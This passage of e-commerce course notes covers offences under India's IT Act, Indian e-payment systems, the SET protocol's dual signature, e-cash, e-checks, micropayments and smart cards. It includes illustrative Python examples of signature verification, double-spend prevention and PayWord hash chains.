Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting material containing a sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains a sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences

Section | Offence | Punishment
65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


• Provides privacy, data integrity, user and merchant authentication, and consumer non-repudiation.

The SET Protocol

What Is a Payment Gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping, etc.


A payment gateway protects credit card details by encrypting sensitive information, such as credit card numbers, to ensure that information passes securely between the customer and the merchant, and also between the merchant and the payment processor.

How It Works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes

• Growing Internet access and mobile subscriber base

• Rising consumer confidence

• Convenient delivery/payment models

• India has been one of the fastest-growing countries for payment cards in the Asia-Pacific region

• India currently has approximately 130 million cards (both debit and credit) in circulation


GROWTH IN e-PAYMENT SYSTEM

REGULATION –

The Reserve Bank of India (RBI) has been supportive of the development of electronic payments.

In this direction, the "Payments and Settlement System Act" was enacted.

Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT –

Indian banks have put in place various channels of electronic payments to encourage customers to adopt the electronic mode.

Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels apart from bank branches.

MARKET MAPPING –

The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode.

Two main reasons for such a shift are:


1. The regulator has mandated routing all high-value transactions electronically to minimize the movement of money and risk.

2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)

• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

Credit cards

Debit cards

ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanction list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function to PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM

There is no paper involved, so electronic payments can be effected directly from home or office.

Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

Electronic payments are fully traceable.

In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

Most banks offer same-day value for payments made to other accounts held in that same bank.

Many banks offer same-day money transfer inter-bank services for large-value payments.

Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.


Features of Payment Methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (Fund Transfer)

• A payment method should be:

– Very secure

– Of low overhead cost

– Transferable

– Acceptable anywhere

– Divisible

– Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality: sensitive messages are encrypted so that they are kept confidential.

– Integrity: nearly all messages are digitally signed to ensure content integrity.

– Authentication: authentication is performed through a public key infrastructure.

SET network architecture

Merchant: a seller, which is connected to an acquirer.

Cardholder: a registered holder of the credit card, who is a buyer.

Issuer: the bank that issues the credit card to a cardholder.

Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.

• A merchant can process various credit cards through a single acquirer.

• Payment Gateway: this is typically connected to the acquirer.

– The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET Digital Certificate System


Dual signature generation and verification –

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– cardholder authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or PI is changed, the dual signature will no longer be valid.
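The dual-signature generation and the two verifications described above, as an added example that is not the page's or SET's own code: the cardholder signs H[ H[PI] || H[OI] ], the merchant verifies with OI and H[PI] only, and the payment gateway verifies with PI and H[OI] only, so neither party sees the other's data. The RSA key is a toy built from two Mersenne primes so the script runs offline with only the standard library, and the hash is truncated to fit under that modulus; both are assumptions for illustration, and a real SET implementation uses proper RSA keys and padded signatures. The sample OI and PI are constructed.

```python
import hashlib

# Toy textbook-RSA key built from two Mersenne primes, 2^31-1 and 2^61-1, so the
# example needs no library and no key generation. Far too small to be secure:
# a constructed illustration only, not a SET key.
P = (1 << 31) - 1
Q = (1 << 61) - 1
N = P * Q                            # about 2^92
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))    # private signing exponent
DIGEST_LEN = 11                      # 88-bit digests keep every value below N


def H(data: bytes) -> bytes:
    """Hash used for H[PI], H[OI] and the outer hash (truncated SHA-256)."""
    return hashlib.sha256(data).digest()[:DIGEST_LEN]


def rsa_sign(digest: bytes) -> int:
    """Cardholder's private-key operation on a digest."""
    return pow(int.from_bytes(digest, "big"), D, N)


def rsa_recover(signature: int) -> int:
    """Public-key operation: D_RSA[ DS | key_public_sign,cardholder ] on the page."""
    return pow(signature, E, N)


def dual_signature(oi: bytes, pi: bytes) -> int:
    """DS = Sign_cardholder( H[ H[PI] || H[OI] ] )."""
    return rsa_sign(H(H(pi) + H(oi)))


def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI in clear and only H[PI]: recomputes H[H[PI] || H[OI]]
    and compares it with the value recovered from DS (steps 1 to 3 on the page)."""
    expected = int.from_bytes(H(h_pi + H(oi)), "big")
    return rsa_recover(ds) == expected


def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI in clear and only H[OI]; same check from its side."""
    expected = int.from_bytes(H(H(pi) + h_oi), "big")
    return rsa_recover(ds) == expected


def demo() -> dict:
    """Run both verifications on constructed sample data, then on tampered copies."""
    oi = b"OI: order 4711, 2 x textbook, total 1500 INR"                # constructed
    pi = b"PI: card-token PLACEHOLDER, expiry PLACEHOLDER, 1500 INR"     # constructed
    ds = dual_signature(oi, pi)
    return {
        "merchant_ok": merchant_verify(oi, H(pi), ds),
        "gateway_ok": gateway_verify(pi, H(oi), ds),
        # a merchant who alters the order can no longer match the DS
        "altered_oi": merchant_verify(b"OI: order 4711, 20 x textbook", H(pi), ds),
        # a gateway presented with a changed payment instruction rejects it too
        "altered_pi": gateway_verify(b"PI: 9999 INR", H(oi), ds),
    }


if __name__ == "__main__":
    print(demo())
```

The point to notice is that both parties compute the same outer hash from different inputs: the merchant never needs PI, only its hash, and the gateway never needs OI, yet a change to either invalidates the single signature.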

DIGITAL ENVELOPE –


SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works; the model is explained in the upcoming slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant for acquiring services, for which the customer authenticates the payment for the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds and the same is transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique.

This is issued by a bank and represents a specified sum of real money.

It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending.

Anonymity is preserved unless double spending is attempted.

Serial numbers can allow tracing to prevent money laundering.
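A minimal issuer-side model of the token flow described in the e-cash payment system above (the customer withdraws tokens from the issuer, spends them at a trader, and the trader redeems them with the issuer), together with the double-spending check from the security bullets, as an added example that is not the page's own code. The issuer authenticates its tokens with an HMAC under a key only it holds and keeps a ledger of redeemed serial numbers, so a forged or altered token and a second deposit of the same serial are both rejected. The class and field names are assumptions, the issuer key and denominations are constructed, and the blind-signature step that gives real e-cash its anonymity is left out.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    """One unit of e-cash: like a banknote it carries a unique serial and a value."""
    serial: str   # unique serial number (hex), as on a currency note
    value: int    # denomination, in a constructed unit
    tag: str      # issuer's HMAC-SHA256 over (serial, value)


class Issuer:
    """Hypothetical e-cash issuer (the customer's bank) that mints and redeems tokens."""

    def __init__(self, key: bytes):
        self._key = key          # secret known only to the issuer
        self._spent = set()      # ledger of serials already redeemed

    def _tag(self, serial: str, value: int) -> str:
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def issue(self, value: int) -> Token:
        """Phase 1: the customer withdraws a token of the requested denomination."""
        serial = secrets.token_hex(16)
        return Token(serial, value, self._tag(serial, value))

    def redeem(self, token: Token) -> str:
        """Phase 3: the trader deposits a token received from a customer."""
        # Authenticity first: a forged tag or an altered value fails this check.
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.value)):
            return "rejected: invalid token"
        # Double spending: each serial may be converted to funds exactly once.
        if token.serial in self._spent:
            return "rejected: already spent"
        self._spent.add(token.serial)
        return f"accepted: credit {token.value} to trader"


def demo() -> list:
    """Walk the three cases a trader can hit on deposit; returns the issuer's verdicts."""
    bank = Issuer(key=b"constructed-issuer-key-not-for-real-use")
    note = bank.issue(100)                          # customer withdraws a 100-unit token
    first = bank.redeem(note)                       # trader deposits it: accepted
    again = bank.redeem(note)                       # same token deposited twice
    inflated = Token(note.serial, 1000, note.tag)   # value altered, tag no longer matches
    forged = bank.redeem(inflated)
    return [first, again, forged]


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Because the issuer is also the only verifier, a MAC is enough here; a scheme where merchants must check tokens offline without the issuer's key would use digital signatures instead, and the spent-serial ledger is what turns "prevent double spending" into a concrete check on the issuer's side.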

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on the safe "https" protocol, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system may be, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

While making the payment, it is very important that the internet connection and power supply remain active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

E-Cash is not for everyone. Low-income segments without computer and internet access are unable to enjoy the use of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make E-Cash better. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business, and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2. Merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low-value transactions. Examples:

Millicent (pre-payment/credit based), PayWord (post-payment)


MICROPAYMENT IS –

Very small payments made over the Web; transactions too small for credit cards; can be as little as a fraction of a cent; an alternative to subscription and advertising; can go in either direction.

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents, and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
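The accumulate-then-settle idea of the scheme above, implemented as a PayWord-style hash chain (PayWord is named among the micropayment examples earlier in this section); this is an added example, not the page's or PayWord's reference code. The customer commits to the root w_0 of a chain w_i = H(w_{i+1}); each payment reveals the next payword, the vendor verifies it with one or more hash computations and no bank round-trip, and the vendor keeps only the last payword so that a single settlement for the whole amount can be made with the broker later. Class names and the chain length are assumptions; in the real scheme the root commitment is signed by the customer and certified by the broker, which is omitted here.

```python
import hashlib
import secrets


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


class PayWordChain:
    """Customer side: w_n is a random seed, w_i = H(w_{i+1}), and w_0 is the root
    committed to the vendor. Revealing w_k pays k units in total."""

    def __init__(self, length: int):
        self.n = length
        seed = secrets.token_bytes(32)         # w_n, never sent to the vendor
        chain = [seed]
        for _ in range(length):
            chain.append(H(chain[-1]))         # chain[j] = w_{n-j}
        self._words = chain[::-1]              # _words[i] = w_i, _words[0] = w_0
        self.spent = 0

    @property
    def root(self) -> bytes:
        return self._words[0]

    def pay(self, units: int = 1):
        """Spend `units` more: returns (index, payword) for the new running total."""
        if self.spent + units > self.n:
            raise ValueError("chain exhausted; commit a new root")
        self.spent += units
        return self.spent, self._words[self.spent]


class Vendor:
    """Vendor side: stores the last verified payword per customer and checks each
    new one locally, so no per-payment message to a bank or broker is needed."""

    def __init__(self, root: bytes):
        self.last_index = 0
        self.last_word = root

    def accept(self, index: int, word: bytes) -> bool:
        if index <= self.last_index:
            return False                       # replayed or out-of-order payword
        x = word
        for _ in range(index - self.last_index):
            x = H(x)                           # H^(index-last)(w_index) must equal w_last
        if x != self.last_word:
            return False                       # forged payword: does not chain to the root
        self.last_index, self.last_word = index, word
        return True

    def amount_owed(self) -> int:
        """Total to settle in one larger payment: the last accepted index."""
        return self.last_index


def demo() -> dict:
    """A customer pays 1, then 2 more units; then a replay and a forgery are tried."""
    chain = PayWordChain(length=10)
    vendor = Vendor(chain.root)
    i1, w1 = chain.pay(1)
    i2, w2 = chain.pay(2)
    return {
        "first": vendor.accept(i1, w1),
        "second": vendor.accept(i2, w2),
        "replay": vendor.accept(i2, w2),
        "forged": vendor.accept(5, secrets.token_bytes(32)),
        "owed": vendor.amount_owed(),
    }


if __name__ == "__main__":
    print(demo())
```

The per-payment cost is a few hash operations on the vendor's side and none at the broker, which is why this shape suits payments too small to justify a card authorization each time; the security caveat is that the root must be bound to the customer (the signed commitment omitted here), since the chain itself only proves that consecutive paywords belong together.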

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. [4] The main benefits from the customer side in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below [6]:

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by Visa™ and MasterCard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to the user's PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with a microchip embedded on it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors, which perform complex encryption routines quickly

